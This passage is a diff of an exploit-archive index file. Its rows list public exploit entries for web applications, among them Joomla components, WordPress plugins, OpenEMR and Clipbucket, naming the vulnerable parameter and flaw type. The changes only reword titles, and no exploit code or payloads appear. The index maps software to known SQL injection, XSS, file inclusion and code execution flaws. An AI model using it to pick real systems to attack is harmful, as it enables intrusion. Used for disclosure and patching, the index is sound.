36459,platforms/cgi/webapps/36459.txt,"Websense 7.6 Products - 'favorites.exe' Authentication Bypass",2011-12-15,"Ben Williams",cgi,webapps,0 -36460,platforms/php/webapps/36460.txt,"Flirt-Projekt 4.8 - 'rub' Parameter SQL Injection",2011-12-17,Lazmania61,php,webapps,0 -36461,platforms/php/webapps/36461.txt,"Social Network Community 2 - 'userID' Parameter SQL Injection",2011-12-17,Lazmania61,php,webapps,0 -36462,platforms/php/webapps/36462.txt,"Video Community Portal - 'userID' Parameter SQL Injection",2011-12-18,Lazmania61,php,webapps,0 +36460,platforms/php/webapps/36460.txt,"Flirt-Projekt 4.8 - 'rub' SQL Injection",2011-12-17,Lazmania61,php,webapps,0 +36461,platforms/php/webapps/36461.txt,"Social Network Community 2 - 'userID' SQL Injection",2011-12-17,Lazmania61,php,webapps,0 +36462,platforms/php/webapps/36462.txt,"Video Community Portal - 'userID' SQL Injection",2011-12-18,Lazmania61,php,webapps,0 36463,platforms/php/webapps/36463.txt,"Telescope 0.9.2 - Markdown Persistent Cross-Site Scripting",2015-03-21,shubs,php,webapps,0 36464,platforms/php/webapps/36464.txt,"Joomla! Component Spider FAQ - SQL Injection",2015-03-22,"Manish Tanwar",php,webapps,0 36466,platforms/php/webapps/36466.txt,"WordPress Plugin Marketplace 2.4.0 - Arbitrary File Download",2015-03-22,"Kacper Szurek",php,webapps,0 -36468,platforms/php/webapps/36468.txt,"PHP Booking Calendar 10e - 'page_info_message' Parameter Cross-Site Scripting",2011-12-19,G13,php,webapps,0 -36469,platforms/php/webapps/36469.txt,"Joomla! Component com_tsonymf - 'idofitem' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0 -36470,platforms/php/webapps/36470.txt,"Tiki Wiki CMS Groupware 8.1 - 'show_errors' Parameter HTML Injection",2011-12-20,"Stefan Schurtz",php,webapps,0 -36471,platforms/php/webapps/36471.txt,"PHPShop CMS 3.4 - Multiple Cross-Site Scripting / SQL Injection",2011-12-20,"High-Tech Bridge SA",php,webapps,0 -36472,platforms/php/webapps/36472.txt,"Joomla! Component com_caproductprices - 'id' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0 -36473,platforms/php/webapps/36473.txt,"Cyberoam UTM 10 - 'tableid' Parameter SQL Injection",2011-12-20,"Benjamin Kunz Mejri",php,webapps,0 +36468,platforms/php/webapps/36468.txt,"PHP Booking Calendar 10e - 'page_info_message' Cross-Site Scripting",2011-12-19,G13,php,webapps,0 +36469,platforms/php/webapps/36469.txt,"Joomla! Component com_tsonymf - 'idofitem' SQL Injection",2011-12-20,CoBRa_21,php,webapps,0 +36470,platforms/php/webapps/36470.txt,"Tiki Wiki CMS Groupware 8.1 - 'show_errors' HTML Injection",2011-12-20,"Stefan Schurtz",php,webapps,0 +36471,platforms/php/webapps/36471.txt,"PHPShop CMS 3.4 - Multiple Cross-Site Scripting / SQL Injections",2011-12-20,"High-Tech Bridge SA",php,webapps,0 +36472,platforms/php/webapps/36472.txt,"Joomla! Component com_caproductprices - 'id' SQL Injection",2011-12-20,CoBRa_21,php,webapps,0 +36473,platforms/php/webapps/36473.txt,"Cyberoam UTM 10 - 'tableid' SQL Injection",2011-12-20,"Benjamin Kunz Mejri",php,webapps,0 36474,platforms/php/webapps/36474.txt,"epesi BIM 1.2 rev 8154 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-21,"High-Tech Bridge SA",php,webapps,0 36478,platforms/php/webapps/36478.php,"WordPress Plugin InBoundio Marketing 1.0 - Arbitrary File Upload",2015-03-24,KedAns-Dz,php,webapps,0 36506,platforms/php/webapps/36506.txt,"pfSense 2.2 - Multiple Vulnerabilities",2015-03-26,"High-Tech Bridge SA",php,webapps,0 -36487,platforms/php/webapps/36487.txt,"WordPress Plugin Comment Rating 2.9.20 - 'path' Parameter Cross-Site Scripting",2012-01-03,"The Evil Thinker",php,webapps,0 -36488,platforms/php/webapps/36488.txt,"WordPress Plugin WHOIS 1.4.2 3 - 'domain' Parameter Cross-Site Scripting",2012-01-03,Atmon3r,php,webapps,0 -36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 - 'ddb' Parameter Cross-Site Scripting",2012-01-04,"Jonathan Claudius",php,webapps,0 +36487,platforms/php/webapps/36487.txt,"WordPress Plugin Comment Rating 2.9.20 - 'path' Cross-Site Scripting",2012-01-03,"The Evil Thinker",php,webapps,0 +36488,platforms/php/webapps/36488.txt,"WordPress Plugin WHOIS 1.4.2 3 - 'domain' Cross-Site Scripting",2012-01-03,Atmon3r,php,webapps,0 +36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 - 'ddb' Cross-Site Scripting",2012-01-04,"Jonathan Claudius",php,webapps,0 36490,platforms/php/webapps/36490.py,"WordPress Plugin Marketplace 2.4.0 - Remote Code Execution (Add Admin)",2015-03-25,"Claudio Viviani",php,webapps,0 -36492,platforms/php/webapps/36492.txt,"GraphicsClone Script - 'term' Parameter Cross-Site Scripting",2012-01-04,Mr.PaPaRoSSe,php,webapps,0 -36493,platforms/php/webapps/36493.txt,"Orchard 1.3.9 - 'ReturnUrl' Parameter URI Redirection",2012-01-04,"Mesut Timur",php,webapps,0 +36492,platforms/php/webapps/36492.txt,"GraphicsClone Script - 'term' Cross-Site Scripting",2012-01-04,Mr.PaPaRoSSe,php,webapps,0 +36493,platforms/php/webapps/36493.txt,"Orchard 1.3.9 - 'ReturnUrl' URI Redirection",2012-01-04,"Mesut Timur",php,webapps,0 36494,platforms/php/webapps/36494.txt,"Limny 3.0.1 - 'login.php' Script Cross-Site Scripting",2012-01-04,"Gjoko Krstic",php,webapps,0 -36495,platforms/php/webapps/36495.txt,"Pligg CMS 1.1.2 - 'status' Parameter SQL Injection",2011-12-29,SiteWatch,php,webapps,0 +36495,platforms/php/webapps/36495.txt,"Pligg CMS 1.1.2 - 'status' SQL Injection",2011-12-29,SiteWatch,php,webapps,0 36496,platforms/php/webapps/36496.txt,"Pligg CMS 1.1.4 - 'SERVER[php_self]' Cross-Site Scripting",2011-12-29,SiteWatch,php,webapps,0 36497,platforms/php/webapps/36497.txt,"UBBCentral UBB.Threads 7.5.6 - 'Username' Cross-Site Scripting",2012-01-04,sonyy,php,webapps,0 36498,platforms/php/webapps/36498.txt,"Yaws-Wiki 1.88 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-01-05,SiteWatch,php,webapps,0 36499,platforms/php/webapps/36499.txt,"StatIt 4 - 'statistik.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-04,sonyy,php,webapps,0 36508,platforms/php/webapps/36508.txt,"VertrigoServ 2.25 - 'extensions.php' Script Cross-Site Scripting",2012-01-05,"Stefan Schurtz",php,webapps,0 -36509,platforms/php/webapps/36509.txt,"SQLiteManager 1.2.4 - main.php dbsel Parameter Cross-Site Scripting",2012-01-05,"Stefan Schurtz",php,webapps,0 -36510,platforms/php/webapps/36510.txt,"SQLiteManager 1.2.4 - 'index.php' Multiple Parameter Cross-Site Scripting",2012-01-05,"Stefan Schurtz",php,webapps,0 -36512,platforms/php/webapps/36512.txt,"eFront 3.6.10 - 'download' Parameter Directory Traversal",2012-01-06,"Chokri B.A",php,webapps,0 +36509,platforms/php/webapps/36509.txt,"SQLiteManager 1.2.4 - 'main.php?dbsel' Cross-Site Scripting",2012-01-05,"Stefan Schurtz",php,webapps,0 +36510,platforms/php/webapps/36510.txt,"SQLiteManager 1.2.4 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-05,"Stefan Schurtz",php,webapps,0 +36512,platforms/php/webapps/36512.txt,"eFront 3.6.10 - 'download' Directory Traversal",2012-01-06,"Chokri B.A",php,webapps,0 36515,platforms/asp/webapps/36515.txt,"DIGIT CMS 1.0.7 - Cross-Site Scripting / SQL Injection",2012-01-07,"BHG Security Center",asp,webapps,0 36520,platforms/php/webapps/36520.txt,"Berta CMS - Arbitrary File Upload",2015-03-27,"Simon Waters",php,webapps,80 -36521,platforms/php/webapps/36521.txt,"Atar2b CMS 4.0.1 - gallery_e.php id Parameter SQL Injection",2012-01-07,"BHG Security Center",php,webapps,0 -36522,platforms/php/webapps/36522.txt,"Atar2b CMS 4.0.1 - pageH.php id Parameter SQL Injection",2012-01-07,"BHG Security Center",php,webapps,0 -36523,platforms/php/webapps/36523.txt,"Atar2b CMS 4.0.1 - pageE.php id Parameter SQL Injection",2012-01-07,"BHG Security Center",php,webapps,0 -36524,platforms/php/webapps/36524.txt,"Clipbucket 2.6 - channels.php cat Parameter Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 -36525,platforms/php/webapps/36525.txt,"Clipbucket 2.6 - collections.php cat Parameter Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 -36526,platforms/php/webapps/36526.txt,"Clipbucket 2.6 - groups.php cat Parameter Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 -36527,platforms/php/webapps/36527.txt,"Clipbucket 2.6 - search_result.php query Parameter Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 -36528,platforms/php/webapps/36528.txt,"Clipbucket 2.6 - videos.php cat Parameter Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 -36529,platforms/php/webapps/36529.txt,"Clipbucket 2.6 - view_collection.php type Parameter Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 -36530,platforms/php/webapps/36530.txt,"Clipbucket 2.6 - view_item.php type Parameter Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 -36531,platforms/php/webapps/36531.txt,"Clipbucket 2.6 - videos.php time Parameter SQL Injection",2012-01-09,YaDoY666,php,webapps,0 -36532,platforms/php/webapps/36532.txt,"Clipbucket 2.6 - channels.php time Parameter SQL Injection",2012-01-09,YaDoY666,php,webapps,0 -36534,platforms/php/webapps/36534.txt,"Marinet CMS - room2.php roomid Parameter SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0 -36535,platforms/php/webapps/36535.txt,"Marinet CMS - galleryphoto.php id Parameter SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0 -36536,platforms/php/webapps/36536.txt,"Marinet CMS - gallery.php id Parameter SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0 +36521,platforms/php/webapps/36521.txt,"Atar2b CMS 4.0.1 - 'gallery_e.php?id' SQL Injection",2012-01-07,"BHG Security Center",php,webapps,0 +36522,platforms/php/webapps/36522.txt,"Atar2b CMS 4.0.1 - 'pageH.php?id' SQL Injection",2012-01-07,"BHG Security Center",php,webapps,0 +36523,platforms/php/webapps/36523.txt,"Atar2b CMS 4.0.1 - 'pageE.php?id' SQL Injection",2012-01-07,"BHG Security Center",php,webapps,0 +36524,platforms/php/webapps/36524.txt,"Clipbucket 2.6 - 'channels.php?cat' Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 +36525,platforms/php/webapps/36525.txt,"Clipbucket 2.6 - 'collections.php?cat' Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 +36526,platforms/php/webapps/36526.txt,"Clipbucket 2.6 - 'groups.php?cat' Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 +36527,platforms/php/webapps/36527.txt,"Clipbucket 2.6 - 'search_result.php?query' Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 +36528,platforms/php/webapps/36528.txt,"Clipbucket 2.6 - 'videos.php?cat' Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 +36529,platforms/php/webapps/36529.txt,"Clipbucket 2.6 - 'view_collection.php?type' Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 +36530,platforms/php/webapps/36530.txt,"Clipbucket 2.6 - 'view_item.php?type' Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 +36531,platforms/php/webapps/36531.txt,"Clipbucket 2.6 - 'videos.php?time' SQL Injection",2012-01-09,YaDoY666,php,webapps,0 +36532,platforms/php/webapps/36532.txt,"Clipbucket 2.6 - 'channels.php?time' SQL Injection",2012-01-09,YaDoY666,php,webapps,0 +36534,platforms/php/webapps/36534.txt,"Marinet CMS - 'room2.php?roomid' SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0 +36535,platforms/php/webapps/36535.txt,"Marinet CMS - 'galleryphoto.php?id' SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0 +36536,platforms/php/webapps/36536.txt,"Marinet CMS - 'gallery.php?id' SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0 36538,platforms/php/webapps/36538.txt,"Gregarius 0.6.1 - Multiple SQL Injections / Cross-Site Scripting",2012-01-09,sonyy,php,webapps,0 36539,platforms/php/webapps/36539.txt,"Advanced File Management 1.4 - 'users.php' Cross-Site Scripting",2012-01-09,Am!r,php,webapps,0 -36540,platforms/php/webapps/36540.txt,"WordPress Plugin Age Verification 0.4 - 'redirect_to' Parameter URI redirection",2012-01-10,"Gianluca Brindisi",php,webapps,0 +36540,platforms/php/webapps/36540.txt,"WordPress Plugin Age Verification 0.4 - 'redirect_to' URI Redirection",2012-01-10,"Gianluca Brindisi",php,webapps,0 36541,platforms/php/webapps/36541.txt,"PHP-Fusion 7.2.4 - 'downloads.php' Cross-Site Scripting",2012-01-10,Am!r,php,webapps,0 36543,platforms/php/webapps/36543.txt,"KnowledgeTree 3.x - Multiple Cross-Site Scripting Vulnerabilities",2012-01-11,"High-Tech Bridge SA",php,webapps,0 36544,platforms/php/webapps/36544.txt,"Kayako SupportSuite 3.x - Multiple Vulnerabilities",2012-01-11,"Yuri Goltsev",php,webapps,0 36547,platforms/asp/webapps/36547.txt,"MailEnable 6.02 - 'ForgottonPassword.aspx' Cross-Site Scripting",2012-01-12,"Sajjad Pourali",asp,webapps,0 -36548,platforms/java/webapps/36548.txt,"Contus Job Portal - 'Category' Parameter SQL Injection",2012-01-13,Lazmania61,java,webapps,0 -36549,platforms/php/webapps/36549.txt,"Joomla! Component com_contushdvideoshare 1.3 - 'id' Parameter SQL Injection",2012-01-12,Lazmania61,php,webapps,0 +36548,platforms/java/webapps/36548.txt,"Contus Job Portal - 'Category' SQL Injection",2012-01-13,Lazmania61,java,webapps,0 +36549,platforms/php/webapps/36549.txt,"Joomla! Component com_contushdvideoshare 1.3 - 'id' SQL Injection",2012-01-12,Lazmania61,php,webapps,0 36550,platforms/php/webapps/36550.txt,"PHP Membership Site Manager Script 2.1 - 'index.php' Cross-Site Scripting",2012-01-16,Atmon3r,php,webapps,0 36551,platforms/php/webapps/36551.txt,"PHP Ringtone Website - 'ringtones.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-15,Atmon3r,php,webapps,0 36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 - Multiple 'index.php' Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 @@ -35584,25 +35585,25 @@ id,file,description,date,author,platform,type,port 36580,platforms/windows/webapps/36580.rb,"Palo Alto Traps Server 3.1.2.1546 - Persistent Cross-Site Scripting",2015-03-31,"Michael Hendrickx",windows,webapps,0 36581,platforms/php/webapps/36581.txt,"Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities",2015-03-31,Mahendra,php,webapps,80 36582,platforms/php/webapps/36582.txt,"OneOrZero AIMS - 'index.php' Cross-Site Scripting",2012-01-18,"High-Tech Bridge SA",php,webapps,0 -36583,platforms/php/webapps/36583.txt,"PostNuke pnAddressbook Module - 'id' Parameter SQL Injection",2012-01-19,"Robert Cooper",php,webapps,0 +36583,platforms/php/webapps/36583.txt,"PostNuke pnAddressbook Module - 'id' SQL Injection",2012-01-19,"Robert Cooper",php,webapps,0 36584,platforms/php/webapps/36584.txt,"Vastal EzineShop - 'view_mags.php' SQL Injection",2012-01-19,Lazmania61,php,webapps,0 -36585,platforms/asp/webapps/36585.txt,"Snitz Forums 2000 - 'TOPIC_ID' Parameter SQL Injection",2012-01-20,snup,asp,webapps,0 +36585,platforms/asp/webapps/36585.txt,"Snitz Forums 2000 - 'TOPIC_ID' SQL Injection",2012-01-20,snup,asp,webapps,0 36586,platforms/php/webapps/36586.txt,"Syneto Unified Threat Management 1.3.3/1.4.2 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-01-20,"Alexander Fuchs",php,webapps,0 36588,platforms/asp/webapps/36588.txt,"Acidcat ASP CMS 3.5 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-21,"Avram Marius",asp,webapps,0 -36589,platforms/php/webapps/36589.txt,"Joomla! Component com_br - 'Controller' Parameter Local File Inclusion",2012-01-23,the_cyber_nuxbie,php,webapps,0 +36589,platforms/php/webapps/36589.txt,"Joomla! Component com_br - 'Controller' Local File Inclusion",2012-01-23,the_cyber_nuxbie,php,webapps,0 36590,platforms/php/webapps/36590.txt,"Tribiq CMS - 'index.php' SQL Injection",2012-01-21,"Skote Vahshat",php,webapps,0 -36591,platforms/php/webapps/36591.txt,"Joomla! Component Full - 'id' Parameter SQL Injection",2012-01-21,the_cyber_nuxbie,php,webapps,0 +36591,platforms/php/webapps/36591.txt,"Joomla! Component Full - 'id' SQL Injection",2012-01-21,the_cyber_nuxbie,php,webapps,0 36592,platforms/php/webapps/36592.txt,"Joomla! Component Vik Real Estate 1.0 - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps,0 -36593,platforms/php/webapps/36593.txt,"Joomla! Component com_xball - 'team_id' Parameter SQL Injection",2012-01-23,CoBRa_21,php,webapps,0 -36594,platforms/php/webapps/36594.txt,"Joomla! Component com_boss - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 +36593,platforms/php/webapps/36593.txt,"Joomla! Component com_xball - 'team_id' SQL Injection",2012-01-23,CoBRa_21,php,webapps,0 +36594,platforms/php/webapps/36594.txt,"Joomla! Component com_boss - 'Controller' Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 36595,platforms/php/webapps/36595.txt,"Joomla! Component com_car - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps,0 -36596,platforms/php/webapps/36596.txt,"Joomla! Component com_some - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 -36597,platforms/php/webapps/36597.txt,"Joomla! Component com_bulkenquery - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 -36598,platforms/php/webapps/36598.txt,"Joomla! Component com_kp - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 +36596,platforms/php/webapps/36596.txt,"Joomla! Component com_some - 'Controller' Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 +36597,platforms/php/webapps/36597.txt,"Joomla! Component com_bulkenquery - 'Controller' Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 +36598,platforms/php/webapps/36598.txt,"Joomla! Component com_kp - 'Controller' Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 36599,platforms/asp/webapps/36599.txt,"Raven 1.0 - 'connector.asp' Arbitrary File Upload",2012-01-21,HELLBOY,asp,webapps,0 36600,platforms/php/webapps/36600.txt,"WordPress Plugin Business Intelligence - SQL Injection (Metasploit)",2015-04-02,"Jagriti Sahu",php,webapps,80 36601,platforms/php/webapps/36601.txt,"Joomla! Component com_rand - SQL Injection",2015-04-02,"Jagriti Sahu",php,webapps,80 -36620,platforms/php/webapps/36620.txt,"WordPress Plugin YouSayToo auto-publishing 1.0 - 'submit' Parameter Cross-Site Scripting",2012-01-24,"H4ckCity Security Team",php,webapps,0 +36620,platforms/php/webapps/36620.txt,"WordPress Plugin YouSayToo auto-publishing 1.0 - 'submit' Cross-Site Scripting",2012-01-24,"H4ckCity Security Team",php,webapps,0 36609,platforms/multiple/webapps/36609.txt,"Kemp Load Master 7.1.16 - Multiple Vulnerabilities",2015-04-02,"Roberto Suggi Liverani",multiple,webapps,80 36610,platforms/php/webapps/36610.txt,"WordPress Plugin Video Gallery 2.8 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-04-02,Divya,php,webapps,80 36611,platforms/php/webapps/36611.txt,"Multiple WordPress UpThemes Themes - Arbitrary File Upload",2015-04-02,Divya,php,webapps,80 @@ -35615,44 +35616,44 @@ id,file,description,date,author,platform,type,port 36618,platforms/php/webapps/36618.txt,"WordPress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80 36619,platforms/linux/webapps/36619.txt,"Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal",2015-04-02,"Anastasios Monachos",linux,webapps,0 36621,platforms/php/webapps/36621.txt,"glFusion 1.x - SQL Injection",2012-01-24,KedAns-Dz,php,webapps,0 -36623,platforms/php/webapps/36623.txt,"Ultimate Locator - 'radius' Parameter SQL Injection",2012-01-24,"Robert Cooper",php,webapps,0 +36623,platforms/php/webapps/36623.txt,"Ultimate Locator - 'radius' SQL Injection",2012-01-24,"Robert Cooper",php,webapps,0 36624,platforms/php/webapps/36624.txt,"Joomla! Component JE Story Submit - 'index.php' Arbitrary File Upload",2012-01-24,"Robert Cooper",php,webapps,0 36625,platforms/php/webapps/36625.txt,"OSClass 2.3.3 - 'index.php' sCategory Parameter SQL Injection",2012-01-25,"High-Tech Bridge SA",php,webapps,0 -36626,platforms/php/webapps/36626.txt,"OSClass 2.3.3 - 'index.php getParam()' Multiple Parameter Cross-Site Scripting",2012-01-25,"High-Tech Bridge SA",php,webapps,0 +36626,platforms/php/webapps/36626.txt,"OSClass 2.3.3 - 'index.php getParam()' Multiple Cross-Site Scripting Vulnerabilities",2012-01-25,"High-Tech Bridge SA",php,webapps,0 36627,platforms/php/webapps/36627.txt,"DClassifieds 0.1 final - Cross-Site Request Forgery",2012-01-25,"High-Tech Bridge SA",php,webapps,0 36628,platforms/php/webapps/36628.txt,"vBadvanced CMPS 3.2.2 - 'vba_cmps_include_bottom.php' Remote File Inclusion",2012-01-25,PacketiK,php,webapps,0 -36629,platforms/php/webapps/36629.txt,"Joomla! Component com_motor - 'cid' Parameter SQL Injection",2012-01-26,the_cyber_nuxbie,php,webapps,0 +36629,platforms/php/webapps/36629.txt,"Joomla! Component com_motor - 'cid' SQL Injection",2012-01-26,the_cyber_nuxbie,php,webapps,0 36630,platforms/php/webapps/36630.txt,"Joomla! Component com_products - Multiple SQL Injections",2012-01-26,the_cyber_nuxbie,php,webapps,0 -36631,platforms/php/webapps/36631.txt,"WordPress Plugin Slideshow Gallery 1.1.x - 'border' Parameter Cross-Site Scripting",2012-01-26,"Bret Hawk",php,webapps,0 -36632,platforms/php/webapps/36632.txt,"xClick Cart 1.0.x - 'shopping_url' Parameter Cross-Site Scripting",2012-01-26,sonyy,php,webapps,0 +36631,platforms/php/webapps/36631.txt,"WordPress Plugin Slideshow Gallery 1.1.x - 'border' Cross-Site Scripting",2012-01-26,"Bret Hawk",php,webapps,0 +36632,platforms/php/webapps/36632.txt,"xClick Cart 1.0.x - 'shopping_url' Cross-Site Scripting",2012-01-26,sonyy,php,webapps,0 36634,platforms/php/webapps/36634.txt,"Joomla! Component com_visa - Local File Inclusion / SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0 -36635,platforms/php/webapps/36635.txt,"Joomla! Component com_firmy - 'Id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0 -36638,platforms/php/webapps/36638.txt,"Joomla! Component com_crhotels - 'catid' Parameter SQL Injection",2012-01-31,the_cyber_nuxbie,php,webapps,0 -36639,platforms/php/webapps/36639.txt,"Joomla! Component com_propertylab - 'id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0 +36635,platforms/php/webapps/36635.txt,"Joomla! Component com_firmy - 'Id' SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0 +36638,platforms/php/webapps/36638.txt,"Joomla! Component com_crhotels - 'catid' SQL Injection",2012-01-31,the_cyber_nuxbie,php,webapps,0 +36639,platforms/php/webapps/36639.txt,"Joomla! Component com_propertylab - 'id' SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0 36640,platforms/php/webapps/36640.txt,"WordPress Plugin Work The Flow File Upload 2.5.2 - Arbitrary File Upload",2015-04-05,"Claudio Viviani",php,webapps,0 36641,platforms/php/webapps/36641.txt,"u-Auctions - Multiple Vulnerabilities",2015-04-05,*Don*,php,webapps,0 36642,platforms/php/webapps/36642.txt,"Joomla! Component com_bbs - Multiple SQL Injections",2012-01-30,the_cyber_nuxbie,php,webapps,0 -36643,platforms/php/webapps/36643.txt,"4Images 1.7.10 - admin/categories.php cat_parent_id Parameter SQL Injection",2012-01-31,RandomStorm,php,webapps,0 -36644,platforms/php/webapps/36644.txt,"4Images 1.7.10 - admin/categories.php cat_parent_id Parameter Cross-Site Scripting",2012-01-31,RandomStorm,php,webapps,0 -36645,platforms/php/webapps/36645.txt,"4Images 1.7.10 - admin/index.php redirect Parameter Arbitrary Site Redirect",2012-01-31,RandomStorm,php,webapps,0 -36646,platforms/php/webapps/36646.txt,"Joomla! Component com_cmotour - 'id' Parameter SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0 +36643,platforms/php/webapps/36643.txt,"4Images 1.7.10 - 'admin/categories.php?cat_parent_id' SQL Injection",2012-01-31,RandomStorm,php,webapps,0 +36644,platforms/php/webapps/36644.txt,"4Images 1.7.10 - 'admin/categories.php?cat_parent_id' Cross-Site Scripting",2012-01-31,RandomStorm,php,webapps,0 +36645,platforms/php/webapps/36645.txt,"4Images 1.7.10 - 'admin/index.php?redirect' Arbitrary Site Redirect",2012-01-31,RandomStorm,php,webapps,0 +36646,platforms/php/webapps/36646.txt,"Joomla! Component com_cmotour - 'id' SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0 36647,platforms/php/webapps/36647.txt,"Lead Capture - 'login.php' Script Cross-Site Scripting",2012-01-21,HashoR,php,webapps,0 -36648,platforms/php/webapps/36648.txt,"OpenEMR 4.1 - Interface/patient_file/encounter/trend_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 -36649,platforms/php/webapps/36649.txt,"OpenEMR 4.1 - Interface/patient_file/encounter/load_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 -36650,platforms/php/webapps/36650.txt,"OpenEMR 4.1 - contrib/acog/print_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 +36648,platforms/php/webapps/36648.txt,"OpenEMR 4.1 - 'Interface/patient_file/encounter/trend_form.php?formname' Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 +36649,platforms/php/webapps/36649.txt,"OpenEMR 4.1 - 'Interface/patient_file/encounter/load_form.php?formname' Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 +36650,platforms/php/webapps/36650.txt,"OpenEMR 4.1 - 'contrib/acog/print_form.php?formname' Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 36651,platforms/php/webapps/36651.txt,"OpenEMR 4.1 - 'Interface/fax/fax_dispatch.php' File Parameter 'exec()' Call Arbitrary Shell Command Execution",2012-02-01,"High-Tech Bridge SA",php,webapps,0 -36654,platforms/php/webapps/36654.txt,"phpLDAPadmin 1.2.2 - 'base' Parameter Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0 -36655,platforms/php/webapps/36655.txt,"phpLDAPadmin 1.2.0.5-2 - 'server_id' Parameter Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0 +36654,platforms/php/webapps/36654.txt,"phpLDAPadmin 1.2.2 - 'base' Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0 +36655,platforms/php/webapps/36655.txt,"phpLDAPadmin 1.2.0.5-2 - 'server_id' Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0 36656,platforms/php/webapps/36656.txt,"GForge 5.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-02-02,sonyy,php,webapps,0 -36657,platforms/php/webapps/36657.txt,"Joomla! Component com_bnf - 'seccion_id' Parameter SQL Injection",2012-02-02,"Daniel Godoy",php,webapps,0 +36657,platforms/php/webapps/36657.txt,"Joomla! Component com_bnf - 'seccion_id' SQL Injection",2012-02-02,"Daniel Godoy",php,webapps,0 36658,platforms/php/webapps/36658.txt,"iknSupport 'search' Module - Cross-Site Scripting",2012-02-02,"Red Security TEAM",php,webapps,0 -36659,platforms/php/webapps/36659.txt,"Joomla! Component Currency Converter 1.0.0 - 'from' Parameter Cross-Site Scripting",2012-02-02,"BHG Security Center",php,webapps,0 +36659,platforms/php/webapps/36659.txt,"Joomla! Component Currency Converter 1.0.0 - 'from' Cross-Site Scripting",2012-02-02,"BHG Security Center",php,webapps,0 36660,platforms/php/webapps/36660.txt,"project-open 3.4.x - 'account-closed.tcl' Cross-Site Scripting",2012-02-03,"Michail Poultsakis",php,webapps,0 -36661,platforms/php/webapps/36661.txt,"PHP-Fusion 7.2.4 - 'weblink_id' Parameter SQL Injection",2012-02-03,Am!r,php,webapps,0 +36661,platforms/php/webapps/36661.txt,"PHP-Fusion 7.2.4 - 'weblink_id' SQL Injection",2012-02-03,Am!r,php,webapps,0 36664,platforms/php/webapps/36664.txt,"Vespa 0.8.6 - 'getid3.php' Local File Inclusion",2012-02-06,T0x!c,php,webapps,0 -36665,platforms/php/webapps/36665.txt,"Simple Groupware 0.742 - 'export' Parameter Cross-Site Scripting",2012-02-07,"Infoserve Security Team",php,webapps,0 -36666,platforms/java/webapps/36666.txt,"ManageEngine ADManager Plus 5.2 Build 5210 - 'Operation' Parameter Cross-Site Scripting",2012-02-07,LiquidWorm,java,webapps,0 -36667,platforms/java/webapps/36667.txt,"ManageEngine 